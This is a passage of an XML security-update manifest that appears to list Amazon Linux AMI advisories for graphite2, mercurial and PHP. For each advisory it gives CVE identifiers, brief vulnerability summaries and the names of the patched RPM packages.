arch="i686"><filename>Packages/openssl-1.0.1k-14.91.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.1k" release="14.91.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.1k-14.91.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.1k" release="14.91.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.1k-14.91.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1k" release="14.91.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.1k-14.91.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-696</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-696: important priority package update for graphite2</title><issued date="2016-05-03 10:30:00" /><updated date="2016-05-03 10:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-1526:
A vulnerability has been discovered in Graphite2. An attacker able to trick an unsuspecting user into opening specially crafted font files in an application using Graphite2 could exploit these flaws to cause the application to crash or, potentially, execute arbitrary code with the privileges of the application.
1308590:
CVE-2016-1526 graphite2: Out-of-bounds read vulnerability in TfUtil:LocaLookup
CVE-2016-1523:
A vulnerability has been discovered in Graphite2. An attacker able to trick an unsuspecting user into opening specially crafted font files in an application using Graphite2 could exploit these flaws to cause the application to crash or, potentially, execute arbitrary code with the privileges of the application.
1305813:
CVE-2016-1523 graphite2: Heap-based buffer overflow in context item handling functionality
CVE-2016-1522:
A vulnerability has been discovered in Graphite2. An attacker able to trick an unsuspecting user into opening specially crafted font files in an application using Graphite2 could exploit these flaws to cause the application to crash or, potentially, execute arbitrary code with the privileges of the application.
1305810:
CVE-2016-1522 graphite2: Null pointer dereference and out-of-bounds access vulnerabilities
CVE-2016-1521:
A vulnerability has been discovered in Graphite2. An attacker able to trick an unsuspecting user into opening specially crafted font files in an application using Graphite2 could exploit these flaws to cause the application to crash or, potentially, execute arbitrary code with the privileges of the application.
1305805:
CVE-2016-1521 graphite2: Out-of-bound read vulnerability triggered by crafted fonts
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1521" title="" id="CVE-2016-1521" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1522" title="" id="CVE-2016-1522" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1523" title="" id="CVE-2016-1523" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1526" title="" id="CVE-2016-1526" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="graphite2-devel" version="1.3.6" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphite2-devel-1.3.6-1.9.amzn1.x86_64.rpm</filename></package><package name="graphite2-debuginfo" version="1.3.6" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphite2-debuginfo-1.3.6-1.9.amzn1.x86_64.rpm</filename></package><package name="graphite2" version="1.3.6" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphite2-1.3.6-1.9.amzn1.x86_64.rpm</filename></package><package name="graphite2-debuginfo" version="1.3.6" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/graphite2-debuginfo-1.3.6-1.9.amzn1.i686.rpm</filename></package><package name="graphite2" version="1.3.6" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/graphite2-1.3.6-1.9.amzn1.i686.rpm</filename></package><package name="graphite2-devel" version="1.3.6" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/graphite2-devel-1.3.6-1.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-697</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-697: important priority package update for mercurial</title><issued date="2016-05-03 10:30:00" /><updated date="2016-05-03 10:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-3630:
The binary delta decoder in Mercurial before 3.7.3 allows remote attackers to execute arbitrary code via a (1) clone, (2) push, or (3) pull command, related to (a) a list sizing rounding error and (b) short records.
1322264:
CVE-2016-3630 mercurial: remote code execution in binary delta decoding
CVE-2016-3069:
It was discovered that the Mercurial convert extension failed to sanitize special characters in Git repository names. A Git repository with a specially crafted name could cause Mercurial to execute arbitrary code when the Git repository was converted to a Mercurial repository.
1320155:
CVE-2016-3069 mercurial: convert extension command injection via git repository names
CVE-2016-3068:
It was discovered that Mercurial failed to properly check Git sub-repository URLs. A Mercurial repository that includes a Git sub-repository with a specially crafted URL could cause Mercurial to execute arbitrary code.
1319768:
CVE-2016-3068 mercurial: command injection via git subrepository urls
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3068" title="" id="CVE-2016-3068" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3069" title="" id="CVE-2016-3069" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3630" title="" id="CVE-2016-3630" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mercurial-debuginfo" version="3.5.2" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mercurial-debuginfo-3.5.2-1.26.amzn1.x86_64.rpm</filename></package><package name="mercurial-common" version="3.5.2" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mercurial-common-3.5.2-1.26.amzn1.x86_64.rpm</filename></package><package name="mercurial-python27" version="3.5.2" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mercurial-python27-3.5.2-1.26.amzn1.x86_64.rpm</filename></package><package name="emacs-mercurial-el" version="3.5.2" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/emacs-mercurial-el-3.5.2-1.26.amzn1.x86_64.rpm</filename></package><package name="mercurial-python26" version="3.5.2" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mercurial-python26-3.5.2-1.26.amzn1.x86_64.rpm</filename></package><package name="emacs-mercurial" version="3.5.2" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/emacs-mercurial-3.5.2-1.26.amzn1.x86_64.rpm</filename></package><package name="emacs-mercurial" version="3.5.2" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/emacs-mercurial-3.5.2-1.26.amzn1.i686.rpm</filename></package><package name="mercurial-python27" version="3.5.2" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/mercurial-python27-3.5.2-1.26.amzn1.i686.rpm</filename></package><package name="mercurial-common" version="3.5.2" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/mercurial-common-3.5.2-1.26.amzn1.i686.rpm</filename></package><package name="mercurial-python26" version="3.5.2" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/mercurial-python26-3.5.2-1.26.amzn1.i686.rpm</filename></package><package name="mercurial-debuginfo" version="3.5.2" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/mercurial-debuginfo-3.5.2-1.26.amzn1.i686.rpm</filename></package><package name="emacs-mercurial-el" version="3.5.2" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/emacs-mercurial-el-3.5.2-1.26.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-698</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-698: important priority package update for php56 php55</title><issued date="2016-05-03 10:30:00" /><updated date="2016-05-03 10:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-4073:
1323103:
CVE-2016-4073 php: Negative size parameter in memcpy
CVE-2016-4072:
1323106:
CVE-2016-4072 php: Invalid memory write in phar on filename containing \\0 inside name
CVE-2016-4071:
1323108:
CVE-2016-4071 php: Format string vulnerability in php_snmp_error()
CVE-2016-4070:
1323114:
CVE-2016-4070 php: Integer overflow in php_raw_url_encode
CVE-2016-3074:
Integer signedness error in GD Graphics Library 2.1.1 (aka libgd or libgd2) allows remote attackers to cause a denial of service (crash) or potentially execute arbitrary code via crafted compressed gd2 data, which triggers a heap-based buffer overflow.
1321893:
CVE-2016-3074 php: Signedness vulnerability causing heap overflow in libgd
CVE-2015-8865:
1323118:
CVE-2015-8865 file: Buffer over-write in finfo_open with malformed magic file
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8865" title="" id="CVE-2015-8865" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3074" title="" id="CVE-2016-3074" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4070" title="" id="CVE-2016-4070" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4071" title="" id="CVE-2016-4071" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4072" title="" id="CVE-2016-4072" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4073" title="" id="CVE-2016-4073" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-devel" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-gd" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-enchant-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-intl-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-imap-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-pgsql" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pgsql-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-dba" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-dba-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-process" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-process-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xml-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-pspell" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pspell-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-recode-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pdo-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-xmlrpc" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-snmp" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-snmp-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-fpm" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-ldap" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-ldap-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-embedded-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-mcrypt" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mcrypt-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-odbc" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-odbc-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-common" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-tidy" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-tidy-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-mbstring" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mbstring-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-cli-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-debuginfo-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-soap" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-mbstring" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mbstring-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-intl" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-intl-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-tidy" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-tidy-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-pdo" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pdo-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-enchant-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-xmlrpc" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pspell-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-debuginfo-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-xml" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xml-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-embedded" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-embedded-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-gd" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gd-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-gmp" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gmp-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-recode" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-cli" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-cli-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-devel" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-common-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-mssql" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mssql-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-dba-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-bcmath-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-pgsql" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-opcache" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-opcache-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-imap" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-mysqlnd" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-odbc-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-process-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-ldap-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-ldap" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-intl" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-common" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-gmp" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-snmp-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-mbstring" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-ldap" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-mysqlnd" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-xml" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-pgsql" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-xmlrpc" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dba-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-mssql" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-recode" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-gd" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-soap" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-mbstring" version="5.6.21" release="1.124.amzn1" epoch="0" 